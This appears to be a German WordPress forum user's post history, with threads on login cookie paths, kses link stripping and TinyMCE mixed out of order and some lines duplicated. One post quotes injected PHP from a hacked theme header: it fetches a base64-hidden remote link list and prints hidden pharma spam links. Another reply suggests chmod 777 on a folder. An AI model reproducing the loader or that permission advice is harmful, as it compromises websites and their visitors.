Ach, Mist.
Vielen Dank aber, Monika, für Deine Hilfe.
Ich werde mich die Tage dann wohl mal an die Arbeit machen.
(und den anderen Antwortern natürlich auch Dank)
Um schreiben oder kommentieren zu können, benötigen Sie ein Benutzerkonto.
Sie haben schon ein Benutzerkonto? Melden Sie sich hier an.
Jetzt anmeldenHier können Sie ein neues Benutzerkonto erstellen.
Neues Benutzerkonto erstellenAch, Mist.
Vielen Dank aber, Monika, für Deine Hilfe.
Ich werde mich die Tage dann wohl mal an die Arbeit machen.
(und den anderen Antwortern natürlich auch Dank)
:-) War auch nur ein Scherz.
Aber es ist doch eine aktuelle 2.7.1, die Plugins sind ebenfalls alle aktualisiert, so eine aktuelle Version vorhanden. Wie kann also ein Loch aus der 2.0.1 für einen Angriff von heute verantwortlich zeichnen?
Du willst mich nur ärgern, stimmts?
Ich könnte es auch dreamweaver durchsuchen lassen, wenn ich wüsste, nach was ich suchen soll...
Nachtrag: Der betreffende Code steht auf jeden Fall im header aller Themes.
Schöne Scheiße!
Im Quelltext meines blogs tauchten in einem 0px hohen div mit hidden overflow so schöne Begriffe auf wie "Viagra, Tramal, Tramaldol, Ciagris" und wie die Konsorten alle heißen.
Ich fand dann in meiner header.php folgenden schadhaften Code:
<?php /* wp_remote_fopen procedure */ $wp_remote_fopen='aHR0cDovL3F3ZXRyby5jb20vc3MvdGVzdF8yMA=='; $blarr=get_option('cache_vars'); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).'.md5'))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).'.txt')); update_option('cache_vars',$blarr); } $blarr=unserialize(base64_decode(get_option('cache_vars'))); if($blarr['hide_text']!='' && sizeof($blarr['links'])>0){ if($blarr['random']){ $new=''; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=''; foreach($blarr['links'] as $k=>$v) $txt_out.='<a href="'.$v.'">'.$k.'</a>'; echo str_replace('[LINKS]',$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ?>
Wer macht so was warum und wie? Ich habe die aktuellste WP-Version, allerdings ein recht altes, geforktes Theme und ne Menge Plugins.
Ich möchte aber natürlich nur ungern diese Plugins kicken und genausowenig möchte ich mein Theme ändern. Eigentlich.
Hat jemand ne Idee, was da los ist?
Beste Grüße
pp
Mal noch was ganz anderes: hast du die Secret-Keys in der wp-config eingetragen, beim Upgrade auf 2.5.x?
Ich oute mich: Nein, habe ich nicht, stattdessen habe ich die Anweisung befolgt, auf gar keinen Fall (!!!!) die wp-config zu löschen. ich glaube, meine wp-config war bis gerade eben noch die von wordpress 1.5 oder so.
Habe ich aber jetzt nachgeholt. Dank Dir nochmal, ich bin immer wieder schwerst begeistert vom support der OS-Gemeinde. Danke, danke, danke.
Ich hab hier noch nen Thread:
WordPress › Support » logging into wordpress 2.5 returns me to wp-login.phpProbier dich mal mittels ?action=logout explizit auszuloggen. Vielleicht hilft das ja.
Kein Erfolg.
Es liegt auch nicht an meinen lokalen Einstellungen, der Kollege im anderen Büro, 25km entfernt, hat dasselbe prob.
NACHTRAG: Gelöst. Ich habe ein drittes (oder viertes) mal die Dateien neu hochgeladen, jetzt funzt es. Sorry, dass es offensichtlich so ein lapidarer Mist war und nochmal vielen Dank für Deine Mühen.
Das nur mal zur "Aufklärung", keine Ahnung ob dir das irgendwie weiter hilft...
Nö. :lol:
Also, ich habe schon verstanden, was Du da schreibst, nur mein Problem ist noch nicht gelöst.
Nein, die plugins sind es nicht, aber vielleicht mache ich einen Fehler beim Definieren des ADMIN_COOKIE_PATH.
Ich sehe es richtig, dass er Pfad vom Root der Domain http://blog.xxx.de auf den Admin-Bereich zeigen soll, right?
In der WP-Settings wird der folgendermaßen gesetzt:
if ( !defined('ADMIN_COOKIE_PATH') )
define( 'ADMIN_COOKIE_PATH', SITECOOKIEPATH . 'wp-admin' );
wobei dort der SITECOOKIEPATH so generiert wird:
Wenn ich also in der wp-config.php den ADMIN_COOKIE_PATH neu definiere, muss ich ihn nach dem Aufruf der wp-settings.php definieren, right?
Und der Pfad geht vom Root der Domain in den wp-admin-Bereich, right?
also: blog.xxx.de/wp-admin/
Bringt aber so nix!!! HELP!:?
Nachtrag: Auch ein Löschen und neu uploaden der Ordner "wp-admin" und "wp-includes" war erfolglos.
Och schon. Ich stell mir grad vor, wenn ich Cookie wäre, und wissen müsste was ein Serverpfad ist... das würde doch meinen Horizont völlig übersteigen, mein Weltbild ins Wanken bringen... ach ich weiß nicht... ich bin doch nur ein armes kleines Cookie! Was weiß ich denn von der großen weiten Serverwelt? :oops:
Wenn ich ein cookie wäre, dann würde ich mich von Dir gerade total unterdrückt und diskriminiert fühlen.
Hast du bei den Plugins mal geguckt?
Ich muss grad noch ein bisschen webspace aufräumen und dumps zurückspielen... grrr, ein Scheißtag.
Vom Document-Root aus, das Server-Root interessiert das Cookie ja nicht.
Das sagst Du so. :lol:
Ist Wordpress bei dir in einem Unterverzeichnis installiert? Dann musst du den Cookie-Pfad natürlich daran anpassen. Sonst hab ich aber auch keine Idee mehr...
Von wo aus gesehen? Vom Server-Root? Vom Document-Root?
Okay, mal noch was: könnte vielleicht ein Plugin schuld sein? Du kannst ja mal alle nacheinander deaktivieren (einfach per FTP das Verzeichnis umbenennen.)
Cookies mal gelöscht vor dem nächsten Login-Versuch?
Jepp. Jedes Mal.
WordPress › Support » Log In failure (login page simply refreshes)
http://forum.wordpress-deutschland.org/installation/3…html#post179532Der "ADMIN_COOKIE_PATH" scheint die Lösung zu sein...
Ich habe die Zeile
[COLOR=#000000][COLOR=#006600]@[/COLOR][COLOR=#0000CC]define[/COLOR][COLOR=#006600]([/COLOR][COLOR=#CC0000]'ADMIN_COOKIE_PATH'[/COLOR][COLOR=#006600], [/COLOR][COLOR=#CC0000]'/'[/COLOR][COLOR=#006600]);[/COLOR][/COLOR]
in die wp-config.php eingetragen ... jetzt gibt es wenigstens so etwas ähnliches wie eine fehlermeldung, nämlich "Bitte melde Dich nochmal an", aber dieses Spiel lässt sich jetzt beliebig wiederholen. Grundsätzlich würde ich aber schon vermuten, dass etwas an den cookie-Einstellungen nicht stimmt. Gibt es dazu irgendwelche Einträge in der DB?
Gruß und Dank
pp
Moin community,
das frontend funktioniert wunderbar, auch comments sind möglich.
Ich kann mich allerdings nicht mehr anmelden, die wp-login.php lädt sich praktisch ohne Fehlermeldung einfach wieder neu, dabei habe ich seit der letzten Anmeldung NICHTS geändert, isch schwör :-D!
Hatte bis gerade die 2.5.1 und dachte, den Fehler ggf. per Upgrade auf die 2.6.2 beheben zu können, aber Pustekuchen, der Fehler besteht.
Außerdem habe ich noch folgendes versucht:
- anderer Browser
- cookies gelöscht
- Passwort geändert
keine Chance ... hat jemand eine Idee?
Thanx, pp
Fehler blieb bei Standardtheme und Deaktivierung sämtlicher Plugins sowie nach uppen der originalen kses.php.
Kurioserweise funzt jetzt wieder alles, nachdem ich das dritte mal eine orginale und dann angepasste kses.php hochgeladen habe.
Frag mich nicht, was das soll.
Besten Dank für die Mühen, Alphawolf!
High community,
seit neuestem beschneidet mein WP2.2 die Links in den Kommentaren, das heißt, dass alle <a href="http://www.xxx.de">Link</a> zu <a>Link</a> gemacht werden.
Ich habe <grins>eigentlich</grins> nichts geändert, als es das erste mal auftrat.
Hat jemand ne Idee?
Muss ich das über die kses.php explizit erlauben? Wenn ja, wie?
Danke und Gruß
pp
Wie sieht es mit den Rechten auf dem Ordner "images" aus? Stelle Sie doch mal probehalber auf 777.
Moiners Leute,
ich würde gern für ein - hmmm: historisches? - blog die Beiträge umgekehrt chronologisch einstellen, also dn ältesten Beitrag ganz oben. Wo kann ich das den wohl einstellen?
Gruß
pp
Update:
Sorry, damit scheint es zu funktionieren
opera 9
Zitat von akemHab ich schon gemacht. Auch sogar schon von nem Windowsrechner aus *g* .. ohne erfolg. Ich bekomm auch kein Kontextmenu vom Uploader angezeigt, wenn ich auf ein hochgeladenes Bild klicke. :mad:
Opera 9 ist da und unterstützt wie versprochen und erwartet den TinyMCE, dafür nicht mehr das einsetzen des Bildes per Kontextmenü... So lang das nicht funzt, würde ich gern den TinyMCE abschalten. Wo kann ich so tun?